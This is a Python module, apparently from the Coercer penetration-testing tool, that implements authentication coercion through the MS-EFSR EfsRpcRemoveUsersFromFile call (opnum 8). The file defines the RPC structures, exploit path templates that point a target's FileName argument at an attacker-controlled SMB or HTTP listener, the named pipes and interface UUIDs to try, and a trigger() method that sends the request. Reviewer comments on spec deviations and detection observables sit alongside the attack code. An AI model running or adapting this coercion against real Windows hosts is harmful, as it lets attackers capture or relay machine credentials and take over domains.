coercer.methods.MS_EFSR.EfsRpcRemoveUsersFromFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcRemoveUsersFromFile.py
  4# Author             : XiaoliChan
  5# Date created       : 18 Mar 2023
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
class EFS_HASH_BLOB(NDRSTRUCT):
    """
    NDR encoding of the EFS_HASH_BLOB type of [MS-EFSR]; it is embedded by
    value in ENCRYPTION_CERTIFICATE_HASH below.

    NOTE(review): the MS-EFSR IDL lists a DWORD byte count (cbData) first and
    the data pointer second, so the member names here appear swapped relative
    to the spec. Only field ORDER is serialized, so this is cosmetic, and the
    names are dictionary keys a caller may index -- confirm before renaming.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )
 19
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    NDR encoding of one ENCRYPTION_CERTIFICATE_HASH entry of [MS-EFSR]:
    a length, a user SID, the certificate hash blob and a display string.

    'Lenght' is a typo for Length, but it is a dictionary key that callers
    may index, so it is deliberately left unchanged.
    NOTE(review): the IDL declares the SID and Hash members as pointers; they
    are embedded by value here. trigger() never populates this structure, so
    the default encoding is what goes on the wire -- confirm against the spec
    if the encoding ever needs to round-trip with a real server reply.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )
 27
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
    """
    NDR encoding of the Users argument of EfsRpcRemoveUsersFromFile: a count
    followed by a single ENCRYPTION_CERTIFICATE_HASH.

    NOTE(review): the IDL declares Users as a size_is(count) array of
    pointers; a single by-value entry is encoded here. Since trigger() leaves
    this field at its default, the simplification has no effect on the
    request that is actually sent.
    """
    # Byte alignment for this struct (presumably suppresses impacket's NDR
    # alignment padding via calculatePad) -- confirm if the layout is changed.
    align = 1
    structure = (
        ('Cert', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )
 34
class _EfsRpcRemoveUsersFromFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcRemoveUsersFromFile() (opnum 8) in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/28609dad-5fa5-4af9-9382-18d40e3e9dec)

    Only FileName is assigned by EfsRpcRemoveUsersFromFile.trigger(); Users is
    left at impacket's default-initialised value.
    """
    opnum = 8
    structure = (
        # The argument the framework substitutes the rendered path into
        # (listed under function["vulnerable_arguments"] below).
        ('FileName', WSTR),
        ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
    )
 44
class _EfsRpcRemoveUsersFromFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The structure is empty: no response fields are decoded, and trigger()
    discards the reply anyway. NOTE(review): the IDL declares a long return
    status; add ('ErrorCode', ULONG) here if the status is ever needed for
    reporting.
    """
    structure = ()
 50
 51
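class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcRemoveUsersFromFile (opnum 8) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    The class attributes are presumably consumed by the MSPROTOCOLRPCCALL
    base / the framework: exploit_paths are the FileName templates rendered
    into self.path, access lists the transports, named pipes and interface
    UUIDs the call is attempted through, and protocol / function describe
    the call for reporting.
    """

    # Templates for the FileName argument; {{...}} placeholders are rendered
    # by the framework. Each string is NUL-terminated for the WSTR encoding.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Bindings the call is attempted through. From a detection standpoint the
    # pipe name / interface UUID pairs below are the observable: the EFSR
    # interface (df1941c5-...) over \PIPE\efsrpc, and the same opnum over the
    # c681d488-... interface exposed on the lsarpc/samr/lsass/netlogon pipes.
    # NOTE(review): the key is spelled "ncan_np" (not "ncacn_np"); it is
    # presumably matched literally by the framework, so it is kept as-is.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Must agree with _EfsRpcRemoveUsersFromFile.opnum and its FileName field.
    function = {
        "name": "EfsRpcRemoveUsersFromFile",
        "opnum": 8,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcRemoveUsersFromFile request with FileName = self.path.

        Returns "" when the request was sent without an exception, the caught
        exception object when dcerpc_session.request() raised, and None when
        no session was supplied. `target` is not used by this method; it is
        part of the trigger() signature shared with the other methods.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcRemoveUsersFromFile()
            request['FileName'] = self.path
            # The reply is intentionally discarded: only whether the request
            # could be sent is reported back to the caller.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Returned rather than raised so the caller can record the error
            # for this path and presumably move on to the next one.
            return err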